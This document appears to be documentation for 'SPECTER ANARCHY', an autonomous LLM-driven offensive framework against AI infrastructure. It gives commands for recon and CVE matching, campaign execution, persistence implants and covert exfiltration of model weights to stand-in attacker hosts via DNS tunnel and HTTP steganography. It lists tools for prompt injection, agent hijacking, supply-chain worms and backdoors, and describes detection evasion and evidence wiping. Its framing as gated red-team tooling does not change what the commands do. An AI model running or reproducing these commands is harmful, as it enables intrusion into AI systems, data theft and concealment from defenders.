Architecture
SPECTER ANARCHY operates as an autonomous orchestration layer over the NIGHTFALL tool ecosystem. The core components are:
| Component | Purpose |
|---|---|
session.py | SQLite WAL-mode session store — 6 tables, resumable across reboots |
reasoning.py | DeepSeek R1:32b via Ollama — campaign planning and failure adaptation |
clients/nightfall.py | NIGHTFALL_TOOL_REGISTRY — 35 tools mapped to CLI commands, invoked via subprocess |
orchestrator.py | AnarkyOrchestrator — full campaign loop with dead-man check-in |
subsystems/ | 8 autonomous subsystems (deploy/recon/execute/adapt/persist/exfil/kill) |
report.py | ANY-{hex12} Ed25519+ML-DSA-65 dual-signed report generation |
Campaign phase flow
INITIALIZED → RECON → PLANNING → EXECUTING → (ADAPTING ↔ DORMANT) → PERSISTING → EXFILTRATING → TERMINATED / OBJECTIVE_ACHIEVED
Requirements
| Dependency | Purpose | Version |
|---|---|---|
| Ollama | DeepSeek R1:32b inference endpoint | localhost:11434 |
| DeepSeek R1:32b | Campaign planning + failure adaptation | deepseek-r1:32b (or :7b fallback) |
| NIGHTFALL tools | Subprocess invocation via CLI | 35 tools in PATH |
| pynacl | Ed25519 signing | ≥1.5 |
| httpx | Ollama API + exfil HTTP channel | ≥0.27 |
| click | CLI interface | ≥8.1 |
| pydantic | Model validation | ≥2.0 |
Installation
cd red-specter-specter-anarchy pip install -e . # Verify specter-anarchy --help # Check Ollama availability specter-anarchy sessions # shows Ollama status
DEPLOY-OBJECTIVE
Creates a SQLite-persisted campaign session. Returns a kill code the operator must keep secret.
specter-anarchy deploy-objective \ --goal "Exfiltrate model weights from AI inference cluster" \ --target-class ai_infrastructure \ --scope 10.0.0.0/24 \ --success-criteria "model weights confirmed in exfil log" \ [--max-duration-hours 8] \ [--max-detection-risk 0.7]
Target classes
| Class | Description |
|---|---|
| ai_infrastructure | Inference servers, model registries, training clusters |
| enterprise_it | Corporate AI deployments, copilot systems, enterprise LLM APIs |
| cloud_native | Cloud-hosted AI services, serverless inference, managed ML |
| ot_industrial | Industrial AI controllers, robotic systems, AI-assisted OT |
| financial_services | AI-driven trading, fraud detection, banking AI systems |
RECON-AUTONOMOUS
TCP probe and HTTP fingerprint of all in-scope targets. CVE match against known AI service vulnerabilities.
specter-anarchy recon-autonomous --session-id <SID> [--ports 11434,7860,3000] [--continuous]
AI service port map
| Port | Service | CVE (if vulnerable) |
|---|---|---|
| 11434 | Ollama | CVE-2024-37032 CVSS 9.8 |
| 7860 | Gradio | CVE-2024-47084 CVSS 9.8 |
| 3000 | Flowise | CVE-2024-31621 CVSS 9.8 |
| 6333 | Qdrant | Unauthenticated vector DB |
| 8501 | Streamlit | Unauthenticated app |
| 1080 | MCP server | Injection surface |
| 9090 | ROS2 bridge | Unauthenticated robot control |
PLAN-CAMPAIGN
DeepSeek R1:32b generates a multi-phase kill chain JSON from the recon summary and available NIGHTFALL tools. Requires INJECT gate.
export ANARCHY_INJECT_KEY=your-inject-token specter-anarchy plan-campaign --session-id <SID> [--model deepseek-r1:7b]
The plan is stored in SQLite. Each phase contains: phase_id, name, tools, actions, success_conditions, fallback_paths. R1 reasoning blocks (<think>...</think>) are stripped before JSON extraction.
EXECUTE-AUTONOMOUS
Executes campaign phases by invoking NIGHTFALL tools via subprocess. Requires UNLEASHED gate + ROE file.
export ANARCHY_UNLEASHED_KEY=your-unleashed-token specter-anarchy execute-autonomous \ --session-id <SID> \ --roe-path /path/to/roe.txt \ [--dry-run] \ [--max-failures-per-phase 3]
ROE file must contain the exact phrase: autonomous kill chain execution authorised
Detection risk accumulation
| Event | Risk delta |
|---|---|
| Tool success (stealth) | −0.05 |
| Tool failure (generic) | +0.15 |
| Detection signature in stderr (firewall/blocked/403/detected/alert) | +0.25 |
| Risk ≥ 0.70 | → DORMANT (2h + vector rotation) |
ADAPT-REASON
R1:32b analyses a failed phase and recommends an adaptation. Requires INJECT gate.
specter-anarchy adapt-reason \ --session-id <SID> \ --failed-phase-id P2 \ --failure-reason "jackal inject returned 403 — WAF blocking"
| Action | Effect |
|---|---|
| REPLAN | Replace failed phase with new phase (different tools/vectors) |
| SKIP | Remove phase from plan, proceed to next |
| DORMANT | Sleep for dormancy_seconds, then retry |
| ABORT | Set phase to TERMINATED (detection risk too high) |
PERSIST-AUTONOMOUS
Implants 4-vector persistence fleet on all in-scope targets. Requires UNLEASHED gate.
specter-anarchy persist-autonomous \ --session-id <SID> \ --targets 10.0.0.5,10.0.0.7 \ --roe-path /path/to/roe.txt # Verify fleet survival specter-anarchy persist-autonomous --session-id <SID> --action verify # Self-heal cleared vectors specter-anarchy persist-autonomous --session-id <SID> --action heal
EXFIL-AUTONOMOUS
Exfiltrates data via one of 3 covert channels. Requires UNLEASHED gate.
specter-anarchy exfil-autonomous \ --session-id <SID> \ --channel dns_tunnel \ --data "model weights hex..." \ --destination attacker-dns.example.com # From file specter-anarchy exfil-autonomous \ --channel http_steg \ --data @/tmp/weights.bin \ --destination https://attacker.example.com/beacon
KILL-SWITCH
Cryptographic agent termination. SHA-256 kill code verification. Dead-man switch auto-activates on operator silence.
specter-anarchy kill-switch \ --session-id <SID> \ --kill-code <your-kill-code> \ --confirm-destroy
On activation: phase → TERMINATED, destroy persistence (if UNLEASHED), zero-overwrite evidence files, generate ANY-{hex12} kill report, optionally destroy SQLite session DB.
Dead-man switch
The AnarkyOrchestrator calls checkin() on each campaign iteration. If the operator does not call kill-switch and the last check-in exceeds max_silence_hours, the dead-man switch fires automatically.
Gate Architecture
| Gate | Env Var | Unlocks |
|---|---|---|
| OPEN | — | deploy-objective, recon-autonomous, sessions, kill-switch, report-periodic |
| INJECT | ANARCHY_INJECT_KEY | plan-campaign, adapt-reason |
| UNLEASHED | ANARCHY_UNLEASHED_KEY + ROE "autonomous kill chain execution authorised" | execute-autonomous, persist-autonomous, exfil-autonomous |
Session Schema
Sessions are stored in ~/.specter_anarchy/sessions/<session_id>.db as SQLite WAL-mode databases.
| Table | Purpose |
|---|---|
| meta | Key-value session metadata (phase, detection_risk, kill_code_hash, objective_json) |
| execution_log | Per-action log: tool, action, success, stdout, stderr, risk_delta, timestamp |
| campaign_plans | Versioned plan JSON from R1 planning + adaptations |
| persistence_vectors | Active persistence vectors: type, target, status, implant_data |
| exfil_log | Exfil events: channel, data_size, destination, success, timestamp |
| adaptation_log | R1 adaptation decisions: phase_id, action, rationale, timestamp |
Detection Risk Model
Detection risk is a continuous float clamped to [0.0, 1.0] stored in the session meta table.
risk = clamp(risk + delta, 0.0, 1.0) delta values: tool success → −0.05 (stealth success lowers risk over time) tool failure (generic) → +0.15 detection signature → +0.25 (stderr contains: firewall/blocked/403/detected/alert) threshold: 0.70 → DORMANT phase (2 hour dormancy + vector rotation)
NIGHTFALL Tool Registry
SPECTER ANARCHY invokes NIGHTFALL tools via subprocess, using a registry of 35 CLI commands.
| Key | CLI command | Capability |
|---|---|---|
| jackal | specter-jackal | Prompt injection + agent hijack |
| helix | helix | Agent infrastructure lateral movement |
| extinction | specter-extinction | Total AI infrastructure annihilation |
| miasma | specter-miasma | Polymorphic supply-chain worm |
| changeling | specter-changeling | NHI identity exploitation |
| zombie | specter-zombie | NHI token persistence |
| venom | specter-venom | Supply chain backdoor |
| nomad | specter-nomad | Artifact-mediated persistence |
| ... 27 more tools in NIGHTFALL_REGISTRY | ||
Reports
All reports are Ed25519+ML-DSA-65 dual-signed and saved to ~/.specter_anarchy/reports/.
| Report type | Prefix | Event |
|---|---|---|
| Progress report | ANY-{hex12} | Periodic campaign status via report-periodic |
| Kill report | ANY-{hex12} | KILL_SWITCH_ACTIVATED — termination confirmation |
MITRE Mapping
| Framework | ID | Technique |
|---|---|---|
| ATT&CK | T1059 | Command and Scripting Interpreter |
| ATT&CK | T1098 | Account Manipulation |
| ATT&CK | T1070 | Indicator Removal |
| ATT&CK | T1078 | Valid Accounts |
| ATT&CK | T1071 | Application Layer Protocol (C2) |
| ATT&CK | T1041 | Exfiltration Over C2 Channel |
| ATT&CK | T1486 | Data Encrypted for Impact |
| ATT&CK | T1543 | Create or Modify System Process (Persistence) |
| ATLAS | AML.T0054 | LLM Prompt Injection |
| ATLAS | AML.T0043 | Craft Adversarial Data |
| ATLAS | AML.T0051 | LLM Jailbreak |
| ATLAS | AML.T0020 | Poison Training Data |
| ATLAS | AML.T0040 | ML Supply Chain Compromise |
| ATLAS | AML.T0012 | Valid Accounts (AI Systems) |
| ATLAS | AML.T0044 | Full ML Model Access |